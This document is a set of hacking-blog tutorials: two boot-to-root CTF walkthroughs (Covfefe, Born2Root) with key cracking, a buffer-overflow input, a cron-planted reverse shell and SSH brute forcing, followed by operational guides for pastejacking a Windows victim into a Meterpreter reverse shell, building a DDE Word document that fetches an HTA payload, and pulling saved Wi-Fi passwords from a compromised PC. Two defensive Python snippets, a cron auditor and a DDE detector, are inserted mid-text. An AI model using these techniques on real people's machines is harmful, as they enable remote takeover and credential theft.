Hack the Covfefe VM (CTF Challenge)


Today we are going to take on another challenge known as “covfefe”. It is a Debian 9 based boot-to-root VM, originally created as a CTF for SecTalks_BNE. The author of this VM is “Tim Kent”. We have to find 3 flags to complete the challenge.
Security Level: Beginner

Penetrating Methodology:

Scanning
· Netdiscover
· Nmap
Enumeration
· Web spidering
· Directory enumeration
Exploiting
· SSH login
· John
Privilege Escalation
· Exploiting SUID executables
Capture the Flag

Walkthrough

Scanning

Let’s start off by scanning the network and identifying host IPs. As illustrated below, we can identify the target host’s IP as 192.168.1.101.
netdiscover



Time to scan the Target’s IP with Nmap.
nmap -A 192.168.1.101
As you can see in the following screenshot, ports 22, 80 and 31337 are open.

Enumeration

Browsing to the IP over HTTP on port 31337 doesn’t give any result.


Directory enumeration using dirb shows two interesting entries, “/.ssh” and “/robots.txt”. The Nmap scan had already shown robots.txt, but to dig deeper we went with dirb.
dirb http://192.168.1.101:31337/


Further enumeration of robots.txt using curl shows a file “/taxes” among others, and as soon as we open it we get our first flag.
curl http://192.168.1.101:31337/robots.txt



On browsing to 192.168.1.101:31337/.ssh we find an SSH private key, a public key and an authorized_keys file: ‘id_rsa’, ‘id_rsa.pub’ and ‘authorized_keys’.



We get a download prompt when opening ‘authorized_keys’ in the browser, so we download it. We downloaded id_rsa in the same way.




When we open authorized_keys we find a username ‘simon’ for the private key.
cat authorized_keys



Exploiting
Now we use the private key to connect to the VM through ssh. But it is asking for a passphrase here.
ssh -i id_rsa simon@192.168.1.101



We have to change its format, which can be done using a John utility called “ssh2john”. It converts ‘id_rsa’ into a hash format recognized by John the Ripper. Now let’s use John the Ripper to crack this hash.


chmod 777 ssh2john.py
python ssh2john.py id_rsa > hash
john hash --show
We find that the passphrase of the key is ‘starwars’. Now we use this passphrase along with the key to connect through SSH.


After a successful SSH login using our newly acquired passphrase, we search for SUID binaries.
ssh -i id_rsa simon@192.168.1.101
find / -perm -u=s -type f 2>/dev/null
Here we notice ‘/usr/local/bin/read_message’, which takes user input and displays a message. We provide ‘simon’ as the username when asked. The message contains a hint about the username: it should be ‘Simon’ instead of ‘simon’.
/usr/local/bin/read_message


Privilege Escalation
When we run ‘read_message’ again and provide ‘Simon’ as the username, we get a message hinting that we can find something in root. When we enter the ‘/root’ folder and list its contents, we find two files named ‘flag.txt’ and ‘read_message.c’. We can’t access flag.txt yet. Moving on, inside read_message.c we find our second flag.


cd /root
ls
cat flag.txt
cat read_message.c


Reading through the source code in the screenshot above, we find that the program compares the first 5 characters of the entered string with ‘Simon’; if they match, it runs /usr/local/sbin/message. But the input buffer is only 20 bytes, so we can overflow it by entering more than 20 bytes of data: the first 5 characters are ‘Simon’, followed by 15 ‘A’s, and then ‘/bin/sh’ starting at the 21st byte.

read_message
SimonAAAAAAAAAAAAAAA/bin/sh
cd /root
ls
cat flag.txt
As soon as we provide this string, we spawn a shell as root. Now we can access flag.txt, and we have found the third flag.

Exploiting Remote machine with Pastejacking

Pastejacking is a technique that takes over the clipboard of a machine: for instance, when you copy text from a website, that text can be riddled with malicious code that will execute when you paste it. This is a very good way to achieve a Meterpreter session because of its simplicity. All that needs to be done is copy some harmless-looking words from the browser and paste them into the command prompt, and that’s it, session!!

We are going to walk you through the process using a tool called PasteZort.
Here’s how it happens:

The first thing you’ll need to do is get the tool from Github.

To keep it simple, from your Kali terminal, navigate to the desktop using “cd Desktop”. Once you’re at “root@kali:~/Desktop#”, type “git clone https://github.com/Zetahack/PasteZort.git”. This will create a PasteZort folder on your desktop with the tool in it.


Open the folder and you will see all the files you need to run this tool; the inside of the folder will look like the screenshot given below.


In order to execute the tool we first must change the permissions of the “encode.rb” file. Right-click on the “encode.rb” file and open its Properties; under Properties, go to the “Permissions” tab and check the box next to “Execute” that says “Allow executing file as program”.


Navigate to the PasteZort folder from the Kali terminal and execute the tool using “python ./PasteZort.py”. Your tool is now running.
Now we can get started making our pastejacking payload using the tool’s interface. We will be making a Windows payload, so in front of “Objectves:” type “1” to choose Windows as the targeted operating system.


After that, again choose option “1” under “Select Payload” to generate a Windows reverse TCP shell. Enter your IP address in “LHOST” and the port number you want the exploit to communicate with in “LPORT”.
You will now get an option to enter the message you want displayed as the pastejacking text, for example: we have written “ping” and “http://www.hackingarticles.in”.
And that’s it, your payload is ready.
You will now be asked if you would like to turn on the Handler; type “Y” and press Enter.


Open a web browser on the victim machine and enter your IP in the address bar; the text you typed in the message section will appear. Select the text and copy it.

Open command prompt on the victim machine, paste the copied text and press Enter.


Go back to the Kali terminal and you will see the Handler starting the reverse TCP connection, and that’s it, you’ve done it. You now have a Meterpreter session, plain and simple.

Hack the Born2Root VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as Born2Root. The credit for making this VM goes to “Hadi Mene”, and it is another boot2root challenge where we have to root the server to complete it. You can download this VM here.
Let’s Breach!!!
Let us start from getting to know the IP of the VM (here I have it at 192.168.1.137, but you will have to find your own).

netdiscover

Use nmap for port enumeration.
nmap -sV 192.168.1.137


The Nmap scan shows us that port 80 is open, so we open the IP address in our browser.



Now the dirb scan shows us directories. We open the icons/ directory and find a few files.



We use the private key found there to log in to the target machine through SSH, together with the names we found on the page we first opened. First we change the permissions of the private key, then we use it to connect through SSH.
chmod 600 id_rsa
ssh -i id_rsa martin@192.168.1.137


When we connect it will ask for a password; just press Enter, it is there for trolling.
Searching through the files, we take a look at the cron jobs.
cat /etc/crontab



We find that a file called sekurity.py in /tmp/ is to be executed every 5 minutes. But the file is missing from the folder. So we create a reverse shell of our own and save it as sekurity.py in the /tmp/ folder.
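From the defender’s side, the weakness here is a cron job whose script lives in a world-writable directory (or does not exist at all). The following Python audit is an added example, not part of the original walkthrough or of the VM: it parses /etc/crontab-style lines and flags such jobs; the crontab text it checks is a constructed sample modelled on the walkthrough, and the jimmy/sekurity.py entry is taken from the text above.

```python
"""Audit an /etc/crontab for jobs that run a script from a world-writable
directory or that reference a script missing from disk: either lets any
local user plant code that cron then runs as the job's owner."""
import os
import shlex

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl"}

# Constructed sample modelled on the walkthrough; not the VM's real crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 *  * * *  root   cd / && run-parts --report /etc/cron.hourly
*/5 * * * *  jimmy  python /tmp/sekurity.py
"""

def job_script(command):
    """First token that is neither an interpreter nor an option, or None."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes in the crontab line
        return None
    for tok in argv:
        if os.path.basename(tok) in INTERPRETERS or tok.startswith("-"):
            continue
        return tok
    return None

def parse_system_crontab(text):
    """Yield (user, command) per job line; skip comments, blanks, VAR=value."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)  # 5 time fields, user, then command
        if len(fields) == 7:
            yield fields[5], fields[6]

def audit_crontab(text, exists=os.path.exists):
    """Return (user, command, reason) for each risky job; `exists` is injectable
    so a crontab copied off a host can be audited elsewhere."""
    findings = []
    for user, command in parse_system_crontab(text):
        script = job_script(command)
        if script is None:
            continue
        if script.startswith(WORLD_WRITABLE):
            findings.append((user, command, "script in world-writable directory"))
        elif script.startswith("/") and not exists(script):
            findings.append((user, command, "script does not exist"))
    return findings
```

Run `audit_crontab(open("/etc/crontab").read())` on a host to list its risky jobs; the Born2Root entry is reported regardless of whether /tmp/sekurity.py currently exists, because the directory itself is the problem.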


Now we set up our listener using netcat and wait for the cron job to execute our file. Once the file is executed we get our reverse shell as a different user.


We use cupp to create a password dictionary for the user hadi, then brute-force SSH with Metasploit’s ssh_login module.


msf > use auxiliary/scanner/ssh/ssh_login
msf(ssh_login) > set rhosts 192.168.1.137
msf(ssh_login) > set username hadi
msf(ssh_login) > set pass_file hadi.txt
msf(ssh_login) > run


Once we enter the shell, we spawn a proper terminal and use hadi’s password (‘hadi123’) to enter the root shell.
python -c "import pty; pty.spawn('/bin/bash')"
su - root


Now that we are root we open the flag.txt and find a congratulatory message for completing the VM challenge.


Exploiting Windows Machine with DDE Exploit

DDE stands for “Dynamic Data Exchange”; this is a method used by Windows to allow one program to subscribe to an item made using another program. This exploit uses that functionality to compromise the victim endpoint. Once the victim clicks on the Word file, an HTA payload is retrieved via HTTP and a session is achieved.

Here is a step-by-step depiction of how it happens:
The code for the exploit has to be copied into Leafpad and saved with a “.rb” extension; you can name it anything you like, but to avoid any confusion, ours is named “dde_delivery.rb”. This file now has to be moved into the windows section of the exploits folder in Metasploit; you can find the path and exploit URL below.


Path of the windows folder in Kali – usr > share > metasploit-framework > modules > exploits > windows

Here is what the exploit being pasted into the “windows” folder will look like.


Now open a terminal and start Metasploit. Once it starts, type “use exploit/windows/dde_delivery” and the exploit will load. All you need to set is srvhost, which is your host IP: type “set srvhost” followed by your IP; you can see what that looks like in the screenshot given below.
Press enter and you’re all set.
Type “exploit” and press Enter.
You will see a code generated; it has been highlighted in the screenshot given below. Copy this code.
NOTE: Do not close the terminal, it must remain active throughout.


Open Microsoft Word and navigate to the “Insert” tab; under the “Text” section you will find “Quick Parts”. Click on it and in the drop-down menu you will see “Field…”.


Click on “Field…” and another window will appear. By default it will look like the screenshot pasted below; click OK.


Once you click OK, the text “!Unexpected End of Formula” will appear. Select this text, right-click on it and in the menu choose “Toggle Field Codes”.


Once this is done, the text will change to “{ =\* MERGEFORMAT }”.


Paste the code you copied from Metasploit within the “{ }”, as seen below.


Save the file in “.docx” format (you can name it anything you like) and close Microsoft Word.
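On the detection side, a document built this way carries its field code in plain XML inside the .docx zip, so it can be found without opening Word. The Python below is an added example, not part of the original post or of Metasploit: it extracts every field instruction from the WordprocessingML parts of a .docx and reports those that invoke DDE or DDEAUTO (the field type this exploit relies on). The document it scans is constructed in memory with a placeholder field code, not the real Metasploit output.

```python
"""Detect Word field codes that invoke DDE (DDE or DDEAUTO) inside a .docx.
Field instructions live in <w:instrText> runs or in w:instr of <w:fldSimple>."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
DDE_RE = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)

def field_codes(xml_bytes):
    """Return every field instruction in one part. Word may split one instruction
    over several <w:instrText> runs, so runs between begin/end are joined."""
    root = ET.fromstring(xml_bytes)
    codes = [e.get(W + "instr", "") for e in root.iter(W + "fldSimple")]
    current = []
    for el in root.iter():
        if el.tag == W + "instrText":
            current.append(el.text or "")
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":      # nested fields are not tracked
                current = []
            elif kind == "end":
                codes.append("".join(current))
    return [" ".join(c.split()) for c in codes if c.strip()]

def find_dde_fields(docx_bytes):
    """Return the DDE field codes found in any word/*.xml part of the .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                hits += [c for c in field_codes(zf.read(name)) if DDE_RE.search(c)]
    return hits

def build_sample_docx(field_code):
    """Constructed minimal .docx with one complex field, as Insert > Field creates."""
    body = (
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> %s </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>!Unexpected End of Formula</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>' % (W[1:-1], escape(field_code))
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", body)
    return buf.getvalue()
```

Headers, footers and footnotes are scanned too because they are also word/*.xml parts; a file is flagged when `find_dde_fields(open(path, "rb").read())` returns a non-empty list.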







You now have a handy Word file that can be opened on a Windows 10 machine to achieve a session.
Here is what it looks like when the word file is opened:
Once the Word file is opened, you will see the following message; click “Yes”.


Next, this message will appear. Again, click “Yes”.


Finally, this message will appear; click “OK”.


Now go back to the terminal in Kali for the good part.
You will see that the moment OK is clicked in the image above, Meterpreter comes online and you have achieved a session just like that!!


In case you were wondering why, at the beginning, we made you manually copy the code into Leafpad and save it into Metasploit: it’s because this is a new exploit and has not yet been added to the Metasploit database.
Have fun and stay ethical. 

Wifi Post Exploitation on Remote PC

The security protocols of Wi-Fi networks are often broken or bypassed, exposing wireless internet traffic to attackers. Through this article one can learn different ways to get Basic Service Set (BSS) information about a remote user’s Wi-Fi as well as their current network connection information, how to extract the saved wireless LAN profiles of a remote PC, and after that how to disconnect the target user’s Wi-Fi. All the following attacks are post-exploitation attacks.
Table of Content
  • Introduction
  • Working of Wi-Fi
  • Types of Wi-Fi security
  • WLAN BSS List
  • WLAN Current Connection
  • WLAN Profile
  • WLAN Disconnect
  • Mimikatz
  • Netsh

Introduction
Wireless local area networking technology is commonly known as Wi-Fi. It provides high-speed internet access as it works over radio waves. The Wi-Fi trademark is owned by the Wi-Fi Alliance; it is officially defined as a Wireless Local Area Network (WLAN). It is supported by many applications and devices such as mobile phones, PDAs, operating systems, video game consoles, etc., which lets all these devices communicate easily.

Working of Wi-Fi
As the name suggests, a Wi-Fi network has no physical connection between sender and receiver. It uses radio frequencies within the part of the electromagnetic spectrum associated with radio waves, and is therefore able to provide high-speed internet access. Every Wi-Fi connection works through an Access Point (AP). The main job of an access point is to broadcast the signal that is then detected by electronic devices; once the signal is detected, they connect to the access point in order to use the Wi-Fi network.

Types of Wi-Fi security
  • Wired Equivalent Privacy
  • Wi-Fi Protected Access
  • Wi-Fi Protected Access 2

Netsh
Now that you have a session on the victim’s PC, drop into a shell and use the following command to list the Wi-Fi networks the victim’s PC has connected to over time:


netsh wlan show profiles



Get BSS information of a remote user’s Wi-Fi connection

This module gathers information about the wireless Basic Service Sets available to the victim machine, i.e. it gives you the SSIDs and other important information about the wireless networks in range.

msf > use post/windows/wlan/wlan_bss_list
msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit


As the above image shows, the PC has so far been connected to Pentest Lab, Sinos, POCO PHONE and ignit. Now we can use the following command to get detailed information about these networks:

netsh wlan show networks mode=bssid


Now use the following command to see the password of a particular Wi-Fi profile:
netsh wlan show profile name="ignit" key=clear




Get current Wi-Fi connection information of a remote user
This module gathers information about the current connection on each wireless LAN interface on the target machine.
msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection
msf post(wlan_current_connection) > set session 5
msf post(wlan_current_connection) > run


Get saved wireless LAN profile of a remote user
This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.
msf post(wlan_current_connection) > use post/windows/wlan/wlan_profile
msf post(wlan_profile) > set session 5
msf post(wlan_profile) > exploit



Disconnect a remote user’s Wi-Fi connection
This module disconnects the current wireless network connection on the specified interface.
msf > use post/windows/wlan/wlan_disconnect
msf post(wlan_disconnect) > set session 5
msf post(wlan_disconnect) > exploit


Other Way
Another way is Mimikatz, loaded in Meterpreter as the kiwi extension. I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.
meterpreter > load kiwi


meterpreter > help
The wifi commands listed there give you the entire wireless connection list, with passwords as well. VOILA! You got it right.
meterpreter > wifi_list
meterpreter > wifi_list_shared